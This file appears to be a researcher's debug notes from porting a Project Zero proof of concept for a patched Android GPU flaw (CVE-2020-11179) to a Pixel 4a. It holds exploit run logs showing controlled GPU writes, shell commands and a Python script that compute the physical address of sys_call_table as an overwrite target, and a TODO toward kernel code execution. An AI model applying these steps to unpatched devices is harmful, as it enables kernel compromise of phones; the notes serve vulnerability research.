POC/debug.txt
#################################################################
# initial conversion P0 C++ poc
# test device: pixel 4a 
# android 10 on build QD4A.2000317.027
# vuln patched in dec 2020, CVE-2020-11179
#################################################################
# initial output from adb shell as user shell

sunfish:/data/local/tmp $ ./adrenaline
starting adrenaline_rptr_child
rptr base is 0xfc0df000
starting adrenaline
starting adrenaline_parent
starting adrenaline_child

# from run.sh
starting adrenaline_rptr_child
rptr base is 0xfc526000
starting adrenaline
starting adrenaline_parent
rptr base is 0xfc526000
starting adrenaline
starting adrenaline_child

#################################################################
# output with hexdump of buffers

sunfish:/data/local/tmp # ./adrenaline
starting adrenaline_rptr_child
00000000  20 30 40 fc 00 00 00 00 00 00 00 00 00 00 00 00  | 0@.............|
rptr base is 0xfc403000
starting adrenaline
starting adrenaline_parent
starting adrenaline_child
00000000  41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00  |AAAA............|
00000000  41 41 41 41 42 42 42 42 00 00 00 00 00 00 00 00  |AAAABBBB........|

#################################################################
# after running once, rptr is out of mapping range, not sure why? 
# that 70e5 addr is constant on 2nd run

adrenaline_rptr: 0x70e50000 is out of global mapping range
starting adrenaline_rptr_child
################################################################
# after adding ability to pass rptr as arg
# no out of mapping error
# but 2nd time rptr leak errors out still, strange behavior
# but proof you can cause multiple gpu writes 
# 

59|sunfish:/data/local/tmp # ./adrenaline
Usage: ./adrenaline <rptr>
No arg will run leak_rptr
starting adrenaline_rptr_child
00000000  01 00 e5 70 00 00 00 00 00 00 00 00 00 00 00 00  |...p............|
adrenaline_rptr: 0x70e50000 is out of global mapping range
59|sunfish:/data/local/tmp # ./adrenaline 0xfc403000
rptr is passed as 0xfc403000
rptr base is 0xfc403000
starting adrenaline
starting adrenaline_parent
starting adrenaline_child
00000000  41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00  |AAAA............|
00000000  41 41 41 41 42 42 42 42 00 00 00 00 00 00 00 00  |AAAABBBB........|
sunfish:/data/local/tmp # 
#############################################################################

# poc note to calculate target addr to overwrite

/* the target physical page (0x821D9000) corresponds to sys_call_table, which is at
 * a fixed physical address that you can calculate by taking the base of "Kernel Code"
 * from /proc/iomem and then adding (sys_call_table - _text) from /proc/kallsyms */

#############################################################################
# from phone 
# note that, 0x80080000 is a very standard kernel load addr
sunfish:/data/local/tmp # cat /proc/iomem | grep Kernel
  80080000-8239ffff : Kernel code
  82990000-83138fff : Kernel data

sunfish:/data/local/tmp # cat /proc/kallsyms | head
ffffff9139080000 t _head
ffffff9139080000 T _text
ffffff9139081000 t do_undefinstr.cfi
ffffff9139081000 T _stext

sunfish:/data/local/tmp # cat /proc/kallsyms | grep sys_call_table
ffffff913b1a5000 r sys_call_table
ffffff913b1a9000 r compat_sys_call_table

# from kallsyms.txt
$ cat pixel4a_kallsyms.txt | grep _text | head
ffffff8008080000 T _text
ffffff8008081000 T __exception_text_start
ffffff8008082074 T __exception_text_end

$ cat pixel4a_kallsyms.txt | grep sys_call_table | head
ffffff800a1a5000 r sys_call_table
ffffff800a1a9000 r compat_sys_call_table

# calculate phys addr:
$ python
Python 3.8.10 (default, Sep 11 2024, 16:02:53) 

# addr from phone, you can see aslr was applied 
>>> hex(0x80080000+(0xffffff913b1a5000-0xffffff9139080000))
'0x821a5000'

# addr via boot.img kallsyms 
# note the addrs are the same
>>> hex(0x80080000+(0xffffff800a1a5000-0xffffff8008080000))
'0x821a5000'
#
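# the same calculation as a script, added here as an example (not part of the
# original notes or the P0 poc). it parses the /proc/iomem and /proc/kallsyms
# lines quoted above instead of retyping the hex, applies
# phys = "Kernel code" base + (symbol - _text), and shows that the result is
# 0x821a5000 both from the live (kaslr-slid) phone and from the boot.img
# kallsyms, because the slide cancels out of (symbol - _text).

```python
# Added example: physical address of a kernel symbol from iomem + kallsyms.
import re

# Sample input, constructed from the output quoted in this file.
IOMEM = """\
  80080000-8239ffff : Kernel code
  82990000-83138fff : Kernel data
"""
# Live /proc/kallsyms from the phone (KASLR slide applied).
KALLSYMS_LIVE = """\
ffffff9139080000 T _text
ffffff913b1a5000 r sys_call_table
"""
# Symbols taken from the boot.img (no slide).
KALLSYMS_IMG = """\
ffffff8008080000 T _text
ffffff800a1a5000 r sys_call_table
"""

def kernel_code_base(iomem: str) -> int:
    """Physical start of the 'Kernel code' range in /proc/iomem output."""
    m = re.search(r"^\s*([0-9a-f]+)-[0-9a-f]+ : Kernel code$", iomem, re.M)
    if m is None:
        raise ValueError("no 'Kernel code' range in /proc/iomem output")
    return int(m.group(1), 16)

def parse_kallsyms(text: str) -> dict:
    """Map symbol name -> virtual address for a kallsyms-style listing."""
    syms = {}
    for line in text.splitlines():
        parts = line.split()          # "<addr> <type> <name>"
        if len(parts) >= 3:
            syms[parts[2]] = int(parts[0], 16)
    return syms

def phys_addr(iomem: str, kallsyms: str, symbol: str) -> int:
    """phys(symbol) = Kernel code base + (symbol - _text), as in the notes."""
    syms = parse_kallsyms(kallsyms)
    return kernel_code_base(iomem) + (syms[symbol] - syms["_text"])

def kaslr_slide(live: str, image: str) -> int:
    """Virtual slide between the running kernel and the unslid boot image."""
    return parse_kallsyms(live)["_text"] - parse_kallsyms(image)["_text"]

if __name__ == "__main__":
    for name, ks in (("phone", KALLSYMS_LIVE), ("boot.img", KALLSYMS_IMG)):
        print(f"{name}: sys_call_table phys {phys_addr(IOMEM, ks, 'sys_call_table'):#x}")
    print(f"kaslr slide: {kaslr_slide(KALLSYMS_LIVE, KALLSYMS_IMG):#x}")
```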
#################################################################
# without root
# you would need an arb read or leak
# that showed you 

1)
cat /proc/iomem | grep Kernel
  80080000-8239ffff : Kernel code

2) some way to derandomize kallsyms
- that would give you _text and sys_call_table 
- via offset and the kaslr slide

#################################################################
# TODO:
# work on context switch and race condition 
# to achieve kernel code exec

#################################################################